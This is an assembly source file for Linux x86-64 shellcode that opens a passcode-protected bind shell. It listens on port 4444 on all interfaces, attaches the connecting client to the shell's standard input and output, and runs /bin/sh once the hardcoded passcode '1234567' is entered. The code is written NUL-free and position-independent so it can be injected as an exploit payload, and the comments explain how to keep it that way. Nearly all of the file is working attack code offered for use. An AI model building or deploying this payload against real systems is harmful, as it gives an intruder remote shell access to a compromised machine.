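; Linux x86-64 bind shell (NASM, Intel syntax), written as NUL-free,
; position-independent shellcode.
;
; Flow: socket -> bind(0.0.0.0:PORT) -> listen -> accept -> dup2 the client
; socket onto fds 2,1,0 -> read an 8-byte passcode -> on match
; execve("//bin/sh"), otherwise exit.
;
; Syscall ABI: nr in rax, args in rdi/rsi/rdx, result in rax; the kernel
; clobbers rcx and r11. To stay small and NUL-free, constants are loaded
; with push/pop or partial-register moves and NO syscall result is checked:
; a failing bind (EADDRINUSE), listen or accept is not detected, and the
; following steps simply run with a bad descriptor.
;
; The passcode is a fixed string embedded in the payload. Anyone who can
; read the payload (or sniff the socket) can read it, so treat it as a
; speed bump against stray scanners, not as authentication.

SYS_READ     equ 0
SYS_CLOSE    equ 3
SYS_DUP2     equ 33
SYS_SOCKET   equ 41
SYS_ACCEPT   equ 43
SYS_BIND     equ 49
SYS_LISTEN   equ 50
SYS_EXECVE   equ 59
SYS_EXIT     equ 60

AF_INET      equ 2
SOCK_STREAM  equ 1
BACKLOG      equ 2
SOCKADDR_LEN equ 16

; Listening port. PORT_BE is the network-order (big-endian) form stored in
; sockaddr_in.sin_port. Choose a port whose two big-endian bytes are both
; non-zero, otherwise the payload stops being NUL-free.
PORT         equ 4444
PORT_BE      equ ((PORT & 0xff) << 8) | (PORT >> 8)

; Expected passcode as a little-endian qword: the bytes "1234567\n".
PASSCODE     equ 0x0a37363534333231
PASSCODE_LEN equ 8

global _start

_start:
    ; sock = socket(AF_INET, SOCK_STREAM, 0)
    push    SYS_SOCKET
    pop     rax
    push    AF_INET
    pop     rdi
    push    SOCK_STREAM
    pop     rsi
    cdq                         ; rdx = 0 (sign of eax = 41); writing edx clears all of rdx
    syscall

    ; rdi = sock for the remaining setup calls. rax becomes 2 (the old rdi),
    ; so its upper bytes are zero and the later "mov al, ..." loads are safe.
    xchg    rdi, rax

    ; Build struct sockaddr_in on the stack:
    ;   sin_family = AF_INET, sin_port = htons(PORT),
    ;   sin_addr   = INADDR_ANY, sin_zero[8] = 0
    push    rdx                 ; sin_zero: rdx is still 0 (not clobbered by syscall)
    mov     dx, PORT_BE         ; rdx = 0x0000_0000_0000_PPPP
    shl     rdx, 16             ; rdx = 0x0000_0000_PPPP_0000
    xor     dl, AF_INET         ; rdx = 0x0000_0000_PPPP_0002
    push    rdx                 ; in memory: 02 00 | PP PP | 00 00 00 00

    ; bind(sock, &server, SOCKADDR_LEN)
    mov     rsi, rsp
    mov     al, SYS_BIND        ; rax was 2, upper bytes already zero
    push    SOCKADDR_LEN
    pop     rdx
    syscall

    ; listen(sock, BACKLOG)
    push    SYS_LISTEN
    pop     rax
    push    BACKLOG
    pop     rsi
    syscall

    ; client = accept(sock, &client_addr, &addrlen)
    ; rax is 0 here only if listen() succeeded; nothing checks that.
    mov     al, SYS_ACCEPT
    sub     rsp, SOCKADDR_LEN   ; 16-byte scratch for the peer address
    mov     rsi, rsp
    push    SOCKADDR_LEN
    mov     rdx, rsp            ; socklen_t addrlen = 16, passed by pointer
    syscall

    ; The listening socket is deliberately left open (close kept commented
    ; out as in the original); the spawned shell inherits it as a spare fd.
    ;push   SYS_CLOSE
    ;pop    rax
    ;syscall

    ; dup2(client, fd) for fd = 2, 1, 0 so the shell's stdio is the socket.
    ; After the xchg: rdi = client, rax = sock (small fd, upper bytes zero).
    xchg    rdi, rax
    push    3
    pop     rsi
dup2cycle:
    mov     al, SYS_DUP2        ; rax holds a small fd from the previous call
    dec     esi
    syscall                     ; returns esi on success
    test    esi, esi            ; explicit loop test: neither the flags nor rcx
    jnz     dup2cycle           ; (clobbered by syscall) are relied on here

    ; n = read(0, buf, PASSCODE_LEN)
    ; rax is the 0 returned by dup2(client, 0) (assuming it succeeded); it
    ; serves both as SYS_READ and as the zero-fill for the 8-byte buffer.
    xor     rdi, rdi
    push    rax                 ; buf[8] = {0}
    mov     rsi, rsp
    push    PASSCODE_LEN
    pop     rdx
    syscall

    ; Compare all PASSCODE_LEN bytes of buf with the expected string.
    ; The count is fixed on purpose rather than taken from read()'s return
    ; value: comparing only n bytes accepts any correct prefix ("1", "12",
    ; ...), and with n == 0 (peer closed the socket) "repe cmpsb" runs zero
    ; iterations, ZF still holds the result of "xor rdi, rdi" and the jnz
    ; falls through straight into the shell. A negative n (read error)
    ; would have walked cmpsb off the stack. With a fixed count, a short
    ; read leaves the tail of buf zero, which cannot match the passcode.
    ; Note: cmpsb stops at the first mismatch, so this is not a
    ; constant-time compare. Assumes DF is clear (normal userspace state).
    push    PASSCODE_LEN
    pop     rcx
    mov     rbx, PASSCODE
    push    rbx
    mov     rdi, rsp            ; rdi = expected; rsi still points at buf
    repe    cmpsb
    jnz     wrong_pwd

    ; execve("//bin/sh", ["//bin/sh", NULL], [NULL])
    push    SYS_EXECVE
    pop     rax
    cdq                         ; rdx = 0 (sign of eax = 59)
    push    rdx                 ; NUL terminator for the path string
    mov     rbx, 0x68732f6e69622f2f   ; "//bin/sh" (little-endian)
    push    rbx
    mov     rdi, rsp            ; rdi = path
    push    rdx                 ; envp[0] = NULL
    mov     rdx, rsp            ; rdx = envp
    push    rdi                 ; argv[0] = path; argv[1] is the NULL pushed above
    mov     rsi, rsp            ; rsi = argv
    syscall

wrong_pwd:
    ; Bad passcode: exit(0) instead of running off the end of the payload
    ; into whatever bytes happen to follow it in memory.
    push    SYS_EXIT
    pop     rax
    xor     edi, edi
    syscall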